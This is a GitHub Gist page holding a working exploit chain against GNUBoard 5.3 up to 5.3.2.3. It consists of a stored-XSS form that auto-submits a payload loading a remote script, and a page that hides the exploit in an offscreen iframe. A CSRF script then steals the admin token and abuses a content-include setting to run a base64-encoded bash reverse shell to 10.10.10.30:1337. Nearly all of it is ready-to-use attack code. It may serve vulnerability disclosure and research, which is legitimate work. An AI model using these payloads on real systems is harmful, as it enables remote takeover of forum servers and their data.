Last active
February 6, 2021 15:11
-
-
Save stypr/c8c51f0653701a20bcaa17da5f86c932 to your computer and use it in GitHub Desktop.
GNUBoard RCE ~2019.1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- | |
Stored XSS (2019.01.02) | |
--> | |
<form action="http://10.10.10.60/gnuboard5/adm/sms_admin/form_group_update.php" method="POST"> | |
<input type='hidden' name='fg_no' value=''> | |
<input type='hidden' name='fg_name' id='payload' value=''> | |
</form> | |
<script> | |
var random = Math.round(Math.random() * 1000000000); | |
var script_url = '//10.10.10.30/vulnerable_rce_good_for_reason/rce.js'; // RCE from admin | |
document.getElementById('payload').value = '" onfocus="$.getScript(\'' + script_url + '\')//10.10.10.60/' + random + '" autofocus value=미분류 '; | |
document.forms[0].submit(); | |
</script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- | |
Exploit start | |
--> | |
<!doctype html> | |
<html> | |
<head> | |
<title>gnuboard5</title> | |
</head> | |
<body> | |
<h1>GNUBoard 5.3.2.3 RCE (Authenticated)</h1> | |
Date: 2019-01-01<br> | |
Affected Browsers: Chrome/Firefox/Edge<br> | |
Affected Version: 5.3 ~ 5.3.2.3<br> | |
<!-- Hide and load exploit.html --> | |
<iframe id="iframe" src="exploit.html" style="width:100px; height:100px; border:0; border:none; position:absolute; top: -1000px; left: -2000px;"></iframe> | |
</body> | |
</html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
CSRF -> RCE Script | |
*/ | |
// Linux Server reverse shell -- Change it to your preferred option | |
// base64 encoded of command ( /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.30/1337 0>&1' ) | |
var cmd = 'L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjEwLjMwLzEzMzcgMD4mMSc='; | |
var ajax_token = ''; | |
var co_id = 'community'; | |
function stage3(){ | |
// Stage3 : Execute command | |
cmd = encodeURIComponent(cmd); | |
var xhr = new XMLHttpRequest(); | |
xhr.open('GET', '../../bbs/content.php?co_id=' + co_id + '&exe=echo ' + cmd + '|base64 -d|bash;%23', true); | |
xhr.send(null); | |
} | |
function stage2(){ | |
// Stage2 : upload vulnerable script | |
post_data = 'w=&co_html=1&token=' + ajax_token + '&co_id=' + co_id + '&co_subject=커뮤니티&co_content=community&co_mobile_content=&co_skin=basic&co_mobile_skin=basic&co_tag_filter_user=0&co_include_head=../plugin/okname/hpcert1.php&co_include_tail=&captcha_key=&co_himg=&co_timg='; | |
var xhr = new XMLHttpRequest(); | |
xhr.onreadystatechange = function() { | |
if (xhr.readyState == XMLHttpRequest.DONE) { | |
stage3(); | |
} | |
} | |
xhr.open('POST', '../contentformupdate.php', true); | |
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); | |
xhr.send(post_data); | |
} | |
function stage1(){ | |
// Stage1 : Get admin token | |
var xhr = new XMLHttpRequest(); | |
xhr.onreadystatechange = function() { | |
if (xhr.readyState == XMLHttpRequest.DONE) { | |
ajax_token = xhr.responseText.split('"token":"')[1].split('"')[0]; | |
stage2(); | |
} | |
} | |
xhr.open('GET', '../ajax.token.php', true); | |
xhr.send(null); | |
} | |
// Start from stage1 | |
stage1(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment